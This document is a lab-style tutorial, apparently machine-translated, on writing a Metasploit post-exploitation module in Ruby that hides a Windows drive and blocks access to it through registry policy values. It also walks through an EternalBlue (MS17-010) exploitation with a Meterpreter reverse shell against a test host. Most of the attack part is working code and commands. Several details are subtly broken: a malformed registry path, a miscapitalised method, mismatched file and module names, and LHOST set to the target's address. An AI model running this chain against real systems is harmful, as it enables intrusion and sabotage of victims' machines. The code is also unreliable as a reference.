Metasploit 5: Writing and Testing a Post-Osmosis Module

Cyber Security
1

Metasploit 5: Writing and Testing a Post-Osmosis Module

Introduction

After a successful penetration of a target host, post-osmosis modules can be used to achieve specific purposes. In this article, we will explore how to write a post-osmosis module in Ruby, load it into Metasploit, and utilize it in a Meterpreter session.

Experimental Environment

  • Kali Linux 2019.1 VM (amd64)
  • Target Host: Windows Server 2008 R2
  • Metasploit v5.0.2

Writing the Osmosis Module

The post-osmosis module is a Ruby file with a .rb suffix. It is used to hide and restrict access to a specific drive after successful penetration of a server.

# This module requires Metasploit: https://metasploit.com/download
# This module is used to hide and restrict access to a particular drive
# after you have successfully penetrated a server

require 'rex'
require 'msf/core'
require 'msf/core/post/windows/registry'

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry

  def initialize
    super('Description' => 'This module is used to hide and restrict access to a particular drive',
          'License' => MSF_LICENSE,
          'Author' => 'Neroqi',
         )
    register_options([OptString.new('DriveCharacter', [true, 'Please SET the Drive Character'])], self.class)
  end

  def drive_converter(drive)
    case drive
    when "A" then return 1
    when "B" then return 2
    when "C" then return 4
    when "D" then return 8
    when "E" then return 16
    when "F" then return 32
    when "G" then return 64
    end
  end

  def run
    drive_int = drive_converter(datastore['DriveCharacter'])
    registry_path = "HKLM \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ Explorer"
    exists = meterpreter_registry_key_exist?(registry_path)
    if exists
      print_good("Registry Path Exists, Creating Values Directly!")
      meterpreter_registry_setvaldata(registry_path, 'NoDrives', drive_int.to_s, 'REG_DWORD', REGISTRY_VIEW_64_BIT)
      print_good("Hiding #{datastore['DriveCharacter']} Drive")
      meterpreter_registry_setvaldata(registry_path, 'NoViewOnDrive', drive_int.to_s, 'REG_DWORD', REGISTRY_VIEW_64_BIT)
      print_good("Restricting Access to #{datastore['DriveCharacter']} Drive")
    else
      print_error("Registry Path Does not Exist, Creating Path Firstly!")
      Registry_createkey(registry_path)
      meterpreter_registry_setvaldata(registry_path, 'NoDrives', drive_int.to_s, 'REG_DWORD', REGISTRY_VIEW_64_BIT)
      print_good("Hiding #{datastore['DriveCharacter']} Drive")
      meterpreter_registry_setvaldata(registry_path, 'NoViewOnDrive', drive_int.to_s, 'REG_DWORD', REGISTRY_VIEW_64_BIT)
      print_good("Restricting Access to #{datastore['DriveCharacter']} Drive")
    end
    print_good("Disabled #{datastore['DriveCharacter']} Drive Successfully!")
  end
end

Testing the Osmosis Module

To test the post-osmosis module, we need to copy it to the correct path in Metasploit.

cp disableDriveNeroqi.rb /usr/share/metasploit-framework/modules/post/windows/manage/

We then need to reload the Metasploit module using reload_all in msfconsole.

msf5> reload_all

We can then use nmap to scan the target host and confirm the presence of the MS17-010 vulnerability.

root@kali:~# nmap -sV -p - --script vuln --script-args unsafe 192.168.110.130

We can then use the auxiliary/scanner/smb/smb_ms17_010 module in Metasploit to confirm the presence of the vulnerability.

msf5> use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010)> set RHOSTS 192.168.110.130
RHOSTS => 192.168.110.130
msf5 auxiliary(scanner/smb/smb_ms17_010)> run

We can then use the exploit/windows/smb/ms17_010_eternalblue module in Metasploit to establish a Meterpreter session.

msf5> use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue)> set RHOST 192.168.110.130
RHOST => 192.168.110.130
msf5 exploit(windows/smb/ms17_010_eternalblue)> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue)> set LHOST 192.168.110.130
LHOST => 192.168.110.130
msf5 exploit(windows/smb/ms17_010_eternalblue)> set LPORT 8000
LPORT => 8000
msf5 exploit(windows/smb/ms17_010_eternalblue)> run

We can then use the post/windows/manage/disable_drive_Neroqi module in Metasploit to disable the D drive.

msf5> use post/windows/manage/disable_drive_Neroqi
msf5 post(windows/manage/disable_drive_Neroqi)> set DriveCharacter D
DriveCharacter => D
msf5 post(windows/manage/disable_drive_Neroqi)> set SESSION 1
SESSION => 1
msf5 post(windows/manage/disable_drive_Neroqi)> run

We can then log in to the target host and verify that the attack is successful.

Open "My Computer", you can see the D drive has disappeared.
Try the "Disk Management" to open the D drive, system error, can not access the D drive.

Conclusion

In this article, we have explored how to write a post-osmosis module in Ruby, load it into Metasploit, and utilize it in a Meterpreter session. We have also demonstrated how to use the module to disable a drive on the target host. This article provides a useful example of how to write and test post-osmosis modules in Metasploit.